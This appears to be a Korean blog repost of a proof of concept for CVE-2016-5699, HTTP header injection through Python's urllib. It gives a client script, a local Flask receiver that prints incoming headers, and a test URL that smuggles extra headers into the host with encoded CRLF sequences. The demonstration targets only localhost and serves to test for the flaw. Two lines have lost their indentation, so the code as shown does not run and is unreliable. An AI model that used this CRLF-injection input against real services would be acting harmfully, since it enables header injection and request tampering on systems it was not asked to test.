336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

참고 : https://github.com/bunseokbot/CVE-2016-5699-poc


poc.py
import urllib.request
import traceback

print("#######################################")
print("Testing HTTP Header injection in Python")
print("Origin : http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html")
print("bunseokbot@UpRoot")
print("#######################################")

while True:
	try:
		url = input("URL : ")
		info = urllib.request.urlopen(url).info()
		print(info)
	except KeyboardInterrupt as kie:
		print("KeyboardInterrupt event found!\nTerminating Program..")
		break
	except Exception as e:
print(traceback.format_exc())

receiver.py
from flask import Flask, request

app = Flask(__name__)
app.debug = True

@app.route("/vulntest")
def vulntest():
	print("###############################################")
	print("Request Header")
	print("###############################################")
	print(request.headers)
	print("###############################################")
	return ''

if __name__ == "__main__":
app.run(port=12345, threaded=True) # localhost only

TEST URL : http://127.0.0.1%0d%0aInjection-success:%20success%0d%0adummy:%20:12345/vulntest


+ Recent posts